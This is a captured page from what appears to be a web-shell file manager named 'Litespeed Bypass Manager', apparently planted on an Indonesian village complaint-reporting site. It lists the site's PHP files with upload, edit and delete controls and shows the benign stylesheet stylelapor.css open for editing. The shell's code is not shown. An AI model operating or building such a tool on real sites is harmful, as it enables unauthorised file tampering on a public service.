Litespeed Bypass Manager
Direktori:
/barurejo-sambeng.id/lapor
⬆️ Kembali
Buat Folder Baru
Buat Folder
Upload File
Upload
⚠️ Litespeed Uploader
Isi Folder
📁
images
Folder
Hapus
📄 aduan.php
Edit
Hapus
📄 contact.php
Edit
Hapus
📄 detailAduan.php
Edit
Hapus
📄 detailLokasi.php
Edit
Hapus
📄 error_log
Edit
Hapus
📄 index.php
Edit
Hapus
📄 kebijakanprivasi.php
Edit
Hapus
📄 ketentuanlayanan.php
Edit
Hapus
📄 stylelapor.css
Edit
Hapus
📄 tambah_komentarpengaduan_proses.php
Edit
Hapus
📄 tambah_suara_proses.php
Edit
Hapus
Edit File: stylelapor.css
------------- Common-CSS----------------*/ body { font-family: 'Open Sans', sans-serif; color: #555; font-size: 14px; font-weight: 300;} li { list-style: none;} a:hover { text-decoration: none; } /* Preloder */ #preloder { position: fixed; width: 100%; height: 100%; top: 0; left: 0; z-index: 999999; background: #000; } .loader { width: 40px; height: 40px; position: absolute; top: 50%; left: 50%; margin-top: -13px; margin-left: -13px; border-radius: 60px; animation: loader 0.8s linear infinite; -webkit-animation: loader 0.8s linear infinite; } @media screen and (max-width: 40.125em) { .progressbar li { width: 40%; } } /*------------- Step Bar----------------*/ .step{ width: 100%; padding:40px; margin-top:30px; } .progressbar{ counter-reset: step; } .progressbar li{ list-style-type: none; float: left; width: 20%; position: relative; text-align: center; font-size: 20px; } .progressbar li:before{ content:counter(step); counter-increment: step; width: 30px; height: 30px; border: 2px solid #bebebe; display: block; margin: 0 auto 10px auto; border-radius: 50%; line-height: 27px; background: white; color: #bebebe; text-align: center; font-weight: bold; box-shadow:0 0 10px rgba(0,0,0,.3) ; z-index: 1; position: relative; } .progressbar li:after{ content: ''; position: absolute; width:100%; height: 3px; background: #979797; top: 15px; left: -50%; z-index: 0; } .progressbar li:first-child:after{ content: none; } .progressbar i{ color:#456345; font-size: 25px; } h2{ text-align: center; } h2 i p{color:#456345;} .progressbar p{font-size:12px;padding:15px;} .progressbar li.active +li:after{ background: DarkRed; } .progressbar li.active:after{ background: DarkRed; } .progressbar li.active:before{ border-color: DarkRed; background: DarkRed; color: white } /*------------- Ending Step Bar----------------*/ @keyframes loader { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); border: 4px solid #f44336; border-left-color: transparent; } 50% { -webkit-transform: rotate(180deg); transform: rotate(180deg); border: 4px solid #673ab7; border-left-color: transparent; } 100% { -webkit-transform: rotate(360deg); transform: rotate(360deg); border: 4px solid #f44336; border-left-color: transparent; } } @-webkit-keyframes loader { 0% { -webkit-transform: rotate(0deg); border: 4px solid #f44336; border-left-color: transparent; } 50% { -webkit-transform: rotate(180deg); border: 4px solid #673ab7; border-left-color: transparent; } 100% { -webkit-transform: rotate(360deg); border: 4px solid #f44336; border-left-color: transparent; } } /*Headers*/ h1,h2,h3,h4,h5,h6 { font-family: 'Open Sans', sans-serif;color: white} h1 { font-size: 50px; } h2 { font-size: 40px; } h3 { font-size: 35px; } h4 { font-size: 30px; } h5 { font-size: 25px; } h6 { font-size: 20px; } ul {padding-left: 0;} /*Add space between sections*/ section+section { margin-top: 50px; } .block-heading { background-image: url("../images/titleBorder.png"); background-repeat: repeat-x; height: 20px; margin: 60px 0; text-align: center; } .block-heading h2 { background: #fff; display: inline-block; color: #000; margin-top: -28px; padding: 5px 30px 10px 30px; border: 1px solid #dedede; } .block-heading h2:hover { box-shadow: 0 0 5px #dedede; } #back-top { position: fixed; bottom: 30px; width: 40px; color: #bbb; height: 50px; right: 30px; display: block; text-align: center; background: url("../images/top.png") no-repeat; } /*------------- Top bar----------------*/ #top { width: 100%; background: White Smoke; font-size: 12px; color: black; padding: 5px 0; -webkit-box-shadow:0 0 4px rgba(0,0,0,.3) ; -moz-box-shadow:0 0 4px rgba(0,0,0,.3) ; box-shadow:0 0 4px rgba(0,0,0,.3) ; } #top .contact-action { margin-bottom: 0; } #top p i { font-size: 16px; margin-right: 10px; } #top .login-cart li { float: left; } #top .login-cart li a { color: #fff ; padding: 0 15px; font-size: 14px; -webkit-transition: .4s ease-in-out; -moz-transition: .4s ease-in-out; -ms-transition: .4s ease-in-out; -o-transition: .4s ease-in-out; transition: .4s ease-in-out; } #top .login-cart li a:hover { color: #555; } #top .login-cart li a i { margin-right: 3px; } header { padding: 40px 0; text-align: center; } /* Search Box Start ==================================================*/ .search-box input { outline: none; border:none; font-size: 12px; padding: 5px; height: 25px; } .search-box button { height: 25px; background: url("../images/search.png") no-repeat; background-color: #fff; padding:10px 16px; background-position: 8px; border: 0; outline: 0; } .search-box label { display: none; } .cart .dropdown { padding: 10px; } .cart .dropup .caret { margin-top: -36px; margin-left: -130px; text-align: left; border-bottom: 4px solid #FFF; } .cart .dropdown-menu { text-align: center; width: 220px; margin-top: 7px; } .cart .dropdown-cart-body { margin: 0 0 15px 0; } .cart .dropdown-menu img { border: 1px solid #dedede; border-radius:100%; height: 64px; width: 64px; margin-left: 10px; padding: 8px; } .cart .dropdown-menu h6 { margin-top: 20px; } .cart .dropdown-menu h6 span { color: #90c322; } .cart .dropdown-menu button { margin: 15px 0; } /* Login Modal Start ==================================================*/ @media screen and (max-width: 450px) { #ModalFile .modal-dialog, #ModalLokasi .modal-dialog { width:100%; } } #ModalFile .modal-content, #ModalLokasi .modal-content { } #ModalFile .modal-dialog, #ModalLokasi .modal-dialog { width:50%; } #ModalFile a, #ModalLokasi a{ color:black; } #ModalFile a:hover, #ModalLokasi a:hover{ color:blue; text-decoration: underline; } #ModalFile .close, #ModalLokasi .close{ width: 30px; height: 30px; border: 2px solid darkred; border-radius: 50%; line-height: 27px; background: white; color: darkred; text-align: center; font-weight: bold; box-shadow:0 0 10px rgba(0,0,0,.3) ; opacity:1; top:0px; position:relative; z-index:2; } #create-account_form, #login_form { float: left; text-align: center; width: 100%; } #create-account_form { margin-right: 11px; margin-top: 0; min-height: 245px; } #create-account_form h3, #login_form h3 { background: none repeat scroll 0 0 lightgray; color: Black; padding:8px 0; font-size: 24px; } #authentication #create-account_form .form_content, #authentication #login_form .form_content { } #create-account_form h4 { font-size: 18px; font-weight: normal; margin: 0 10px; padding-bottom: 22px; text-align: left; } #create-account_form #email_create, #login_form #username, #login_form #passwd, #login_form #login_email, #login_form #login_passwd { height: auto; padding: 5px; width: 100%; } #create-account_form .text label { display: none; } #create-account_form h3, #authentication #login_form h3 { background: none repeat scroll 0 0 #212224; color: #FFFFFF; } #authentication #create-account_form .form_content, #authentication #login_form .form_content { background: none repeat scroll 0 0 #F0F0F0 !important; } .text label { display: none; } #login_form > fieldset , #create-account_form > fieldset { } /* Nav Start ==================================================*/ .nav-main li { -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; font-size: 17px; } .nav-main > li::before { top: -2px; -webkit-transform: translateY(-10px); -moz-transform: translateY(-10px); transform: translateY(-10px); } .nav-main > li:after{ bottom: -2px; -webkit-transform: translateY(10px); -moz-transform: translateY(10px); transform: translateY(10px); } .nav-main > li::before, .nav-main > li::after { position: absolute; left: 0; width: 100%; height: 2px; background: red; content: ''; opacity: 0; -webkit-transition: opacity 0.3s, -webkit-transform 0.3s; -moz-transition: opacity 0.3s, -moz-transform 0.3s; transition: opacity 0.3s, transform 0.3s; } .nav-main > li:hover:before, .nav-main > li:hover:after{ opacity: 1; -webkit-transform: translateY(0px); -moz-transform: translateY(0px); transform: translateY(0px); } .nav-main > li a:hover, .nav-main > li a:focus { color: #90c322; } .nav-main > li a { padding: 20px 15px; color: #555; font-size: 17px; } .navbar-nav { float: none; text-align: center; } .navbar-nav>li { float: none; display: inline-block; margin:0 10px; } .nav-main .dropdown-menu a:hover{ background: #fff; } .nav-main .dropdown-menu li a { color: #555; text-align: left; padding: 6px 10px; } .nav-main .dropdown-menu li:hover { color: #fff; } .navbar-nav .active { border-top: 2px solid red; border-bottom: 2px solid red; margin: -1px 0; } .navbar-nav .active a { background: #fff !important; } .nav-main .dropdown-menu li a:hover { color: #fff; background: #90c322; } .navbar-default .navbar-nav>.open>a, .navbar-default .navbar-nav>.open>a:hover, .navbar-default .navbar-nav>.open>a:focus { background: transparent; } .nav-main .dropdown-menu { margin-top: 5px; padding: 0; } .navbar-nav>li>.dropdown-menu { margin-top: 2px; } .navbar-sticky { position: -webkit-sticky; position: sticky; top: 0; box-shadow: 0 0 7px #dedede; } /* Slider Start ==================================================*/ #slider-area { margin-top: 30px; } .nivo-prevNav, .nivo-nextNav{ height: 40px; width: 40px; text-indent: 9999px; background-position: 0px 0px; -webkit-transition: margin 0.3s ease-in-out; -moz-transition: margin 0.3s ease-in-out; -ms-transition: margin 0.3s ease-in-out; -o-transition: margin 0.3s ease-in-out; transition: margin 0.3s ease-in-out; background-repeat: no-repeat; } .nivo-prevNav { background: url("../images/large_left.png"); margin-left: -60px; } .nivo-nextNav { background: url("../images/large_right.png"); margin-right: -60px; } .nivo-prevNav:hover { background-position: 0px -40px; } .nivo-nextNav:hover { background-position: 0px -40px; } #slider:hover .nivo-prevNav { margin-left: 20px; } #slider:hover .nivo-nextNav { margin-right: 20px; } .nivo-controlNav { display: none; } .nivo-caption { background: none; } .nivo-directionNav a{ display: block; } .nivoSlider { border:10px solid #fff; -webkit-box-shadow:0 0 4px rgba(0,0,0,.3) ; -moz-box-shadow:0 0 4px rgba(0,0,0,.3) ; box-shadow:0 0 4px rgba(0,0,0,.3) ; } /* Feature Start ==================================================*/ @media screen and (min-width: 450px) { #features .block { margin-left:0px; margin-right:px; padding:0px; } } #features .block { background:darkred; color: black; padding: 3px; border-radius:5px; -webkit-box-shadow:0 0 5px rgba(0,0,0,.3) ; -moz-box-shadow:0 0 5px rgba(0,0,0,.3) ; box-shadow:0 0 5px rgba(0,0,0,.3) ; margin:15px; } #features .block:hover { background:white; } #features .block .media { border: 1px solid #fff; border-radius:5px; background:white; } #features .block .isiaduan { height:65px; } #features .linkaduan { color:darkgray; } #features .linkaduan:hover { color:darkred; } #features .block .media:hover { background-color:darkred; color:white; } #features .block .media:hover .media-body h5{color:lightgray;} #features .block .media:hover p {color:lightgray;} #features .block .media:hover .tagar {color:lightgray;} #features .block .media:hover .tagar i {color:black;} #features .block .media:hover .pull-left i {color:black;} #features .block .media:hover .nama {color:lightgray;} #features .block .media:hover .tanggal{color:lightgray;} #features .block .media:hover .tanggal i{color:lightgray;} #features .block .status { margin: 10px; border-radius:3px; text-align:center; } #features .Disposisi { background:#483D8B; } #features .Open { background:red; } #features .Direspon { background:blue; } #features .Selesai { background:green; } #features .block .status h6 { font-size:12px; color:white; padding:5px; letter-spacing: 5px; } #features .block .status i { font-size:12px; } #features .block .media-heading{ margin: 10px; color: black; } #features .block p{ margin: 10px; color: black; } #features .block .media-body h5{ margin: 10px; color: black; font-weight:bold; font-size: 16px; } #features .block i { font-size: 40px; margin-left: 10px; color:white; } #features .block .pull-left i { font-size: 40px; margin-left: 10px; color:#456345; } #features .block .nama { font-size: 14px; margin-left: 5px; margin-top:2px; color: black; font-weight: bold; } #features .block .tanggal{ font-size: 12px; margin-left: 5px; color: black; margin-top:0px; } #features .block .tanggal i{ font-size: 12px; color: black; } #features .tagar { font-size: 12px; margin-left: 5px; color: black; margin-top:0px; color:darkred; } #features .tagar i{ font-size: 12px; color:darkred; } /* Catagorie Start ==================================================*/ #catagorie .block { margin-top: 30px; } #catagorie .block .thumbnail { border: none; cursor: pointer; } #catagorie .block .thumbnail:hover .catagotie-head img { opacity: 0.7; } #catagorie .block .thumbnail a img { width: 100%; border:1px solid #dedede; -webkit-transition: all .3s ease-in-out; -moz-transition: all .3s ease-in-out; -ms-transition: all .3s ease-in-out; -o-transition: all .3s ease-in-out; transition: all .3s ease-in-out; } #catagorie .block .thumbnail a img:hover { opacity: 0.7; } #catagorie .block .thumbnail:hover h3 { color: #90c322; } #catagorie .block .thumbnail a h3 { font-weight: 500; -webkit-transition: all .3s ease-in-out; -moz-transition: all .3s ease-in-out; -ms-transition: all .3s ease-in-out; -o-transition: all .3s ease-in-out; transition: all .3s ease-in-out; } #catagorie .block .thumbnail .caption p { font-size: 14px; color: #4b4b4b; font-weight: 300; } #catagorie .block .thumbnail .caption { padding: 0; } .catagorie-box p span { font-weight: bold; } .catagorie-box .catagotie-head h3 { color: #121212; } /* New Products Start ==================================================*/ .products-heading { margin-top: 20px; } .products-heading h2 { margin: 0px 0 20px ; border-top: 5px solid #90c322; display: inline-block; } .products { text-align: center; margin-bottom: 65px; cursor: pointer; } #products img{ -webkit-box-shadow:0 0 4px rgba(0,0,0,.3) ; -moz-box-shadow:0 0 4px rgba(0,0,0,.3) ; box-shadow:0 0 4px rgba(0,0,0,.3) ; padding:5px; } #products img:hover{ opacity: 0.5; } .products a img { width: 100%; border: 1px solid #dedede; -webkit-transition: 0.3s ease-in-out; -moz-transition: 0.3s ease-in-out; -ms-transition: 0.3s ease-in-out; -o-transition: 0.3s ease-in-out; transition: 0.3s ease-in-out; } .products:hover a img{ opacity: 0.7; border: 1px solid #90c322; } .products:hover h4 { color: #90c322; } .products a h4 { margin-top: 14px; -webkit-transition: 0.2s ease-in-out; -moz-transition: 0.2s ease-in-out; -ms-transition: 0.2s ease-in-out; -o-transition: 0.2s ease-in-out; transition: 0.2s ease-in-out; } .products a h4:hover { color: #90c322; } #products + section{ margin-top: 20px; margin-bottom: 30px; } .view-link { text-align: center; border: 1px solid #dedede; display: block; padding: 8px 10px; font-size: 17px; color: #555; font-weight: bold; } .view-link:hover { border: 1px solid #90c322; } .view-link:hover i { color: #fff; } .view-link i { padding-right: 10px; color: #555; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; } .price { font-size: 22px; color: #90c322; font-weight: bold; margin-bottom: 8px; } /* Call To Action Start ==================================================*/ /* Footer Start ==================================================*/ footer { background: #2e323a; color: hsl(0deg, 0%, 100%); padding-top: 0px; text-align:center; } footer .block { color: #B6B6B6; } footer .block p i { color: #dedede; margin-right: 10px; background: #555; width: 24px; line-height: 24px; text-align: center; } footer .block h4 { margin-bottom: 20px; color: #fff; } footer .block .logo p { text-align: center; display: block; } footer .block .media-object { border:1px solid #747474; padding: 2px; height: 75px; } footer .block .media>.pull-left { margin-bottom: 10px; } footer .block span { color: #fff; } .footer-bottom { width: 100%; border-top: 1px solid #2C2C2C; box-shadow: 0 -1px 0 #575656; text-align:center; } .copyright-text { margin-top: 10px; color: white; } .copyright-text a { color: #90c322; } .copyright-text a:hover { text-decoration: underline; } /* Social Icon Start ==================================================*/ .social-icon li { float: left; margin-right: 8px; } .social-icon li a i { color: #fff; font-size: 20px; } .social-icon li a { padding: 8px; background: #90c322; display: inline-block; } .facebook-icon .fa-facebook { padding: 0px 7px; } .facebook-icon:hover { background: #4965a0; } .twitter-icon:hover { background: #3bc1ed; } .pinterest-icon:hover { background: #d02128; } .linkedin-icon:hover { background: #1d87be; } .twitter-icon:hover { background: #3bc1ed; } .plus-icon:hover { background: #dd4b39; } /*----------------Cash Out--------------------*/ .cash-out { padding: 0; margin-bottom: 0px; margin-top:20px; } .cash-out li { float: left; } .cash-out li p { padding-right: 40px; color:white; } .cash-out li p { -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -ms-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .cash-out li p:hover { opacity: 0.7; } /* Shutter Button Start ==================================================*/ .shutter { position: relative; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; } .shutter:before { width: 100%; height: 0; top: 0; left: 0; display: block; content: ""; position: absolute; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; z-index: -1; } .shutter:hover:before { height: 100%; background: #90c322; color: #fff; } .shutter:hover { color: #fff; } .btn-transparent { position: relative; border-radius: 0; } .btn-transparent:hover { border-color: #90c322; } .btn-transparent:before { position: absolute; width: 100%; height: 0; content: ""; display: block; top: 0; left: 0; z-index: 3; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; } .btn-transparent:hover:before { height: 100%; background: #90c322; color: #fff; } .btn-transparent:hover span { color: #fff; } .btn-transparent span { z-index: 5; position: relative; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; } /* Owl Slider Start ==================================================*/ #owl-example { cursor: pointer; } #owl-example img { width: 100%; } .owl-theme .owl-controls { margin-top: 0; margin-bottom: 20px; } .connect-heading { margin-top: 40px; } /* End Of Home Page....... ==================================================*/ /* Blog Page Start....... ==================================================*/ #topic-header { background: #FCFCFC; width: 100%; padding: 20px 0; margin: -20px 0; } #topic-header h1,#topic-header p { margin: 0; } #topic-header .breadcrumb { background: transparent; padding: 30px 0 0; } #topic-header .breadcrumb li a { color: #90c322; } #blog { margin-bottom: 50px; } .blog-body .block { border: 1px solid #dedede; box-shadow: 0 0 3px #C4C4C4; padding: 5px; } .blog-body .block img { width: 100%; } .blog-text { padding: 20px; } #blog .blog-zone { margin: 30px 0 0 0; position: relative; } /* The line */ #blog .blog-zone:before { content: ''; position: absolute; top: 0; bottom: 0; width: 6px; background: #c7e488; left: 1%; margin-left: -8px; } #blog .blog-zone > li { position: relative; } /* The date/time */ #blog .blog-zone > li .cbp_tmtime { display: block; width: 25%; padding-right: 100px; position: absolute; } #blog .blog-zone > li .cbp_tmtime span { display: block; text-align: right; } #blog .blog-zone > li .cbp_tmtime span:first-child { font-size: 0.9em; color: #bdd0db; } #blog .blog-zone > li .cbp_tmtime span:last-child { font-size: 2.9em; color: #90c322; } /* Right content */ #blog .blog-zone > li .blog-box { margin: 0 0 30px 8%; background: #fff; border: 1px solid #dedede; color: #fff; padding: 8px; font-size: 1.2em; font-weight: 300; line-height: 1.4; position: relative; border-radius: 2px; } #blog .blog-zone > li:nth-child(odd) .blog-box { background: #fff; border: 1px solid #dedede; } #blog .blog-zone > li:nth-child(odd) .blog-box:after { border-right-color: #90c322; } /* The icons */ #blog .blog-zone > li .blog-icon { width: 40px; height: 40px; font-size: 1.4em; line-height: 40px; position: absolute; color: #fff; background: #90c322; border-radius: 50%; box-shadow: 0 0 0 8px #C7E488; text-align: center; left: 1%; top: 0; margin: 0 0 0 -25px; } .blog-box img { width: 100%; } .blog-box p { color: #666; } .blog-post-tag { background: #eee; padding-left: 17px; border-left: 3px solid #90c222; } .blog-post-tag .block i { color: #90c322; } .blog-post-tag .block p{ display: inline-block; color: #999; font-size: 14px; } .blog-post-tag .block p a { color: #999; } .blog-post-tag .block { margin-right: 10px; display: inline-block; } .blog-post-body { padding: 15px; } .blog-post-body a h2 { color: #90c322; margin-bottom: 20px; } .blog-post-body p { font-size: 16px; color: #555; padding-top: 10px; } #blog .pagination>.active>a { background: #90c322; border-color: #90c322; color: #fff; } #blog .pagination>li>a { color: #333; } #blog .blog-zone > li:last-child .blog-box { margin-bottom: 0; } /* Blog Single Page Start....... ==================================================*/ .blog-post-body blockquote { font-size: 13px; border-left: 5px solid #90c322; padding: 0 0 0 25px; margin: 20px 0 20px 20px; color: #AFAFAF; } .blog-post-body blockquote p { color: #AFAFAF; font-size: 18px; } .author-id ,.comments-box,.leave-comment { } .comments-box { background: white; } .author-id .media h4 { margin: 0; } .author-id .media i ,.comments-box .media i{ font-size:32px; color:lightgray; background:black; border-radius:50%; padding:0 5px; } .author-id .media-heading { color: #555; } .author-id .media-body p { color: #777; font-size: 13px; } .author-id .media h5 { background: #EEE; margin: 0 0 20px; padding: 0 0 0 20px; line-height: 38px; color: #999; text-shadow: 1px 1px 1px #FFF; } .comments-box .media-heading span,.comments-box .media-heading a { font-style: italic; font-size: 13px; color: #90c322; } .comments-box .media { background: white; } .comments-box .media p{ font-size: 12px; } .comments-box .media-body { padding: 0 5px; } .comments-box .reply { margin-left: 75px; border-bottom: none; } .leave-comment .form-group textarea { resize:none; } /*-------- Blog Sidebar-------------*/ .blog-sidebar .block { margin-bottom: 50px; } .blog-sidebar .block .media-heading { color: #666; font-size: 17px; display: block; margin:0; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; } .blog-sidebar .block .media-heading:hover { color: #90c322; } .blog-sidebar .block .media-list { padding-top: 10px; } .blog-sidebar .block .media-body p { color: #777; font-size: 13px; } .blog-sidebar .block .media a img { width: 64px; border-radius: 2px; } .blog-sidebar { padding: 20px 0; } .blog-sidebar .block .list-group-item:first-child, .blog-sidebar .block .list-group-item:last-child { border-top-right-radius: 0px; border-top-left-radius: 0px; border-bottom-right-radius: 0px; border-bottom-left-radius: 0px; } .blog-sidebar .block .list-group .list-group-item { color: #333; -webkit-transition: .2s ease-in-out; -moz-transition: .2s ease-in-out; -ms-transition: .2s ease-in-out; -o-transition: .2s ease-in-out; transition: .2s ease-in-out; } .blog-sidebar .block .list-group .list-group-item i { margin-right: 5px; } .blog-sidebar .block .list-group .list-group-item:hover { background: #90c322; color: #fff; padding-left: 20px; } /*-------- Tag-----------*/ .tag-link h2 { margin-top: 0px; margin-bottom: 20px; } .tag-link a { color: #fff; background: #90c322; padding: 8px 10px; display: inline-block; margin-bottom: 5px; } .tag-link a:hover { text-decoration: underline; } /* Shop Page Start....... ==================================================*/ .product-grid ul { text-align: center; } .product-grid ul li { width: 33%; text-align: center; padding: 10px 20px 0 0px; display: inline-block; vertical-align: top; } @media screen and (max-width: 57em) { .product-grid ul li { width: 49%; } } @media screen and (max-width: 40.125em) { .product-grid ul li { width: 100%; } } #shop .products-heading h2 { font-size: 30px; } .pagination-bottom { text-align: center; } .pagination-bottom .pagination .active a { background: #90c322; border:1px solid #90c322; color: #fff; } .pagination-bottom .pagination a { color: #333; } /* Shop Single Page Start....... ==================================================*/ @media screen and (min-width: 450px) { #detailaduan .container { width: 100%; } #detailaduan .thumbnail, .kertas { padding-left:5px; padding-right:5px; padding-top:40px; padding-bottom:40px; padding:20px; } } @media screen and (min-width: 800px) { #detailaduan .container { width: 60%; } #detailaduan .kertas { padding:40px; } } #detailaduan .layanan , p{ text-algin:justify; } #detailaduan .tab-content { padding: 10px; margin-top:20px; margin-bottom:20px; } #detailaduan .nav-tabs { margin-top:20px; } #detailaduan .nav-tabs .active a { color: darkred; border-top:0px; border-left:0px; border-right:0px; border-bottom:2px solid darkred; } #detailaduan .nav-tabs li a { color: #333; border-bottom:1px solid #dedede; } #detailaduan .notif{ width: 30px; height: 30px; padding:0 5px; border-radius: 100%; background: darkred; color: white; font-weight:bold; } .single-product-img { border:1px solid #dedede; } .product-des { border:1px solid #dedede; padding:10px 15px; } .product-des .view-link { background: #90c322; color: #fff; } .product-des .view-link i { color: #fff; } .top-catagori-heading { margin-top: 0; } /* Detail Aduan */ @import url('https://fonts.google.com/specimen/Poppins'); .kertas { background: #fff; box-shadow: 0 0 10px rgba(0, 0, 0, 0.3); margin: 26px auto 0; padding: 24px; position: relative; width: 100%; } .kertas:before, .kertas:after { content: ""; height: 100%; position: absolute; width: 100%; z-index: -1; } .kertas:before { background: #fafafa; box-shadow: 0 0 8px rgba(0, 0, 0, 0.2); left: -5px; top: 4px; transform: rotate(-2.5deg); } .kertas:after { background: #f6f6f6; box-shadow: 0 0 3px rgba(0, 0, 0, 0.2); right: -3px; top: 1px; transform: rotate(1.4deg); } #detailaduan { margin-top:40px; margin-bottom:40px; } #detailaduan .shadow { -webkit-box-shadow:0 0 4px rgba(0,0,0,.3) ; -moz-box-shadow:0 0 4px rgba(0,0,0,.3) ; box-shadow:0 0 4px rgba(0,0,0,.3) ; } #detailaduan .thumbnail .keterangan{ font-size:11px; margin-left:10px; } #detailaduan .thumbnail .respon{ border-radius:7px; font-weight:bold; color:white; font-size:11px; padding:3px 6px ; margin-left:5px; } #detailaduan .thumbnail .Disposisi { background:#483D8B; } #detailaduan .thumbnail .Open { background:red; } #detailaduan .thumbnail .Direspon { background:blue; } #detailaduan .thumbnail .Selesai { background:green; } #detailaduan .thumbnail h3 { color:tomato; text-align:left; font-family: 'Fira Sans', sans-serif; font-weight:bold; }
Simpan
Catatan: Mengedit file biner tidak disarankan.